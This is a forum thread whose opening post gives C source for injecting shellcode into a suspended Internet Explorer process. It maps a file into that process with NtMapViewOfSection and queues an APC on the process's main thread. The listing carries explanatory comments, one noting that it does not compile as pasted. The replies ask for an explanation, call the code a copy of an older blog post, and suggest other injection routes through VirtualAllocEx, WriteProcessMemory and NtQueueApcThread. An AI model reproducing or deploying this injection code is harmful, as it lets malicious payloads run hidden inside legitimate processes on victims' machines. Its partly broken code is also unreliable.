  1. #1
    The_USDL

    Code Injection - QueueUserAPC

    Code:
     #define _WIN32_WINNT 0x0400
            #include <windows.h>
     
     //Press Thanks to USDL :)
    //Press Thanks to USDL :)
    //Press Thanks to USDL :)
    
            // NTSTATUS is modelled as a signed 32-bit LONG. NT_SUCCESS() treats any
            // non-negative value as success, i.e. the sign bit is the failure bit.
            typedef LONG NTSTATUS, *PNTSTATUS;
            #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
     
            // Inherit-disposition argument for NtMapViewOfSection (see the call in
            // MyMapViewOfFileEx below). Only ViewShare is used in this listing.
            typedef enum _SECTION_INHERIT
            {
            ViewShare = 1,
            ViewUnmap = 2
            } SECTION_INHERIT;
     
     
     
            // Prototype for the ntdll export NtMapViewOfSection, which WinMain resolves
            // at run time with GetProcAddress. The slots, in the order the call in
            // MyMapViewOfFileEx fills them: section handle, process handle, in/out base
            // address, zero bits, commit size, in/out section offset, in/out view size,
            // inherit disposition, allocation type, page protection (this matches the
            // documented NtMapViewOfSection signature).
            // NOTE(review): `_INHERIT` is not declared anywhere in this listing, so the
            // typedef does not compile as pasted.
            typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE,
            HANDLE,
            LPVOID,
            ULONG,
            SIZE_T,
            LARGE_INTEGER*,
            SIZE_T*,
            _INHERIT,
            ULONG,
            ULONG );
     
            // Global function pointer. It is NULL at file scope and is only assigned in
            // WinMain; MyMapViewOfFileEx calls through it without checking for NULL.
            func_NtMapViewOfSection NtMapViewOfSection = NULL;
     
     
     
     
     
     
     
     
     
     
            // Maps a view of hFileMappingObject into the address space of hProcess by
            // calling NtMapViewOfSection directly. The parameter list mirrors
            // MapViewOfFileEx, with an explicit target process added in front.
            //
            // hProcess            - process that receives the view.
            // hFileMappingObject  - section handle (from CreateFileMapping in WinMain).
            // dwDesiredAccess     - FILE_MAP_* flags; converted to a PAGE_* value below.
            // dwFileOffsetHigh/Low- halves of the 64-bit section offset.
            // dwNumberOfBytesToMap- requested view size, passed through as ViewSize.
            // lpBaseAddress       - preferred base address, or NULL.
            //
            // Returns the base address of the new view inside hProcess, or NULL when
            // the NT call reports failure. The function never unmaps anything; the
            // view is left for the caller (nothing in this listing unmaps it).
            //
            // Depends on the global NtMapViewOfSection having been resolved already
            // (WinMain does this); it is NULL until then and is not checked here.
            LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess,
            HANDLE hFileMappingObject,
            DWORD dwDesiredAccess,
            DWORD dwFileOffsetHigh,
            DWORD dwFileOffsetLow,
            DWORD dwNumberOfBytesToMap,
            LPVOID lpBaseAddress )
            {
            NTSTATUS Status;
            LARGE_INTEGER SectionOffset;
            // NOTE(review): ViewSize is ULONG here while the typedef above declares
            // SIZE_T* for this slot; the two only agree in width on 32-bit builds.
            ULONG ViewSize;
            ULONG Protect;
            LPVOID ViewBase;
     
     
            // Convert the offset: the two DWORD halves become one 64-bit LARGE_INTEGER.
            SectionOffset.LowPart = dwFileOffsetLow;
            SectionOffset.HighPart = dwFileOffsetHigh;
     
            // Save the size and base. Both are in/out for the NT call, so the kernel
            // may update them with the actual base and size it chose.
            ViewBase = lpBaseAddress;
            ViewSize = dwNumberOfBytesToMap;
     
            // Convert flags to NT Protection Attributes. First matching flag wins:
            // write, then read, then copy-on-write; anything else (including 0)
            // yields PAGE_NOACCESS.
            if (dwDesiredAccess & FILE_MAP_WRITE)
            {
            Protect = PAGE_READWRITE;
            }
            else if (dwDesiredAccess & FILE_MAP_READ)
            {
            Protect = PAGE_READONLY;
            }
            else if (dwDesiredAccess & FILE_MAP_COPY)
            {
            Protect = PAGE_WRITECOPY;
            }
            else
            {
            Protect = PAGE_NOACCESS;
            }
     
            // Map the section. Zero bits, commit size and allocation type are all 0;
            // ViewShare is the inherit disposition (presumably "child processes
            // inherit the view", per the NT semantics -- not shown on this page).
            Status = NtMapViewOfSection(hFileMappingObject,
            hProcess,
            &ViewBase,
            0,
            0,
            &SectionOffset,
            &ViewSize,
            ViewShare,
            0,
            Protect);
            if (!NT_SUCCESS(Status))
            {
            // We failed: the NTSTATUS is discarded, the caller only sees NULL.
            return NULL;
            }
     
            // Return the base as (possibly) updated by the kernel.
            return ViewBase;
            }
     
     
     
     
            // Entry point. The sequence visible here is: resolve NtMapViewOfSection from
            // ntdll, open C:\shellcode.txt read-only and wrap it in a PAGE_READONLY file
            // mapping, start iexplore.exe with its primary thread suspended, map the
            // section into that process with FILE_MAP_READ (-> PAGE_READONLY via
            // MyMapViewOfFileEx), queue a user-mode APC whose routine is the view base,
            // resume the thread, and close the handles.
            //
            // No return value is checked on this path: a failed LoadLibrary,
            // GetProcAddress, CreateFile, CreateFileMapping, CreateProcess or mapping
            // flows into the following calls as NULL / INVALID_HANDLE_VALUE.
            //
            // From a detection standpoint every individual step is an ordinary
            // Win32/NT call; what characterizes this listing is the ordered chain
            // suspended-create -> section mapped into the new process -> APC queued on
            // its primary thread -> ResumeThread.
            int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
            {
            // Resolve the ntdll export into the global pointer used by MyMapViewOfFileEx.
            // hDll is never released with FreeLibrary.
            HMODULE hDll = LoadLibrary( "ntdll.dll" );
            NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");
            // Getting a shellcode, use whatever you want -- the file is opened read-only
            // and its raw bytes become the section contents.
            HANDLE hFile = CreateFile ("C:\\shellcode.txt",
            GENERIC_READ,
            0,
            NULL,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            NULL);
            // Section over the whole file (max size 0/0), read-only protection.
            HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
            // Starting target process. STARTUPINFO is zeroed except for cb.
            STARTUPINFO st;
            ZeroMemory (&st, sizeof(st));
            st.cb = sizeof (STARTUPINFO);
            PROCESS_INFORMATION pi;
            ZeroMemory (&pi, sizeof(pi));
            // Hard-coded, locale-specific path ("Programme" is a localized Program
            // Files directory name). CREATE_SUSPENDED keeps the primary thread from
            // running until ResumeThread below.
            CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe",
            NULL,
            NULL,
            NULL,
            FALSE,
            CREATE_SUSPENDED,
            NULL,
            NULL,
            &st,
            &pi);
            // Injecting the shellcode into target process address space: offset 0,
            // size 0, no preferred base; the result is the view base in pi.hProcess
            // (or NULL, which is not checked).
            LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess,
            hMappedFile,
            FILE_MAP_READ,
            0,
            0,
            0,
            NULL);
            // Queue a user-mode APC on the suspended primary thread. The view base is
            // cast to PAPCFUNC, so the first bytes of the mapped file are treated as the
            // APC routine (argument NULL). Per the author's claim it runs when the
            // thread is first resumed; this listing does not show what enforces that.
            QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
            ResumeThread (pi.hThread);
            // Close local handles. Closing these does not affect the view already
            // mapped into the target (presumably the view keeps the section alive;
            // not demonstrated here).
            CloseHandle (hFile);
            CloseHandle (hMappedFile);
            CloseHandle (pi.hThread);
            CloseHandle (pi.hProcess);
            return 0;
            }

    PRESS THANKS
    Last edited by The_USDL; 2012-02-08 at 07:07 PM.

  2. #2
    DatSik
    I appreciate this; could you explain a bit more? If you have time, that is — it's not a big deal, but I would like to hear what you have to say.

  3. #3
    Sirmabus

    Copy and paste? Also use the ntdll.dll version

    Did you copy and paste this or from some other blog from 2007?
    远程代码注入新技术 - hackycz的日志 - 网易博客
    It's the same exact code.

    It's interesting to map a shared memory and do it this way. The more traditional way is to use VirtualAllocEx() to allocate memory in the remote process, then WriteProcessMemory() to write to it.
    You usually only need to write, mostly; the advantage I see in using shared memory is that you could read from it directly, plus if you need repeated access it's faster than going through the xxxxxProcessMemory() functions.

    Also it would be better to use the internal ntdll.dll layer version "NtQueueApcThread()" instead, as QueueUserAPC() has some relevant process context stuff that might either cause it to fail or crash your target.

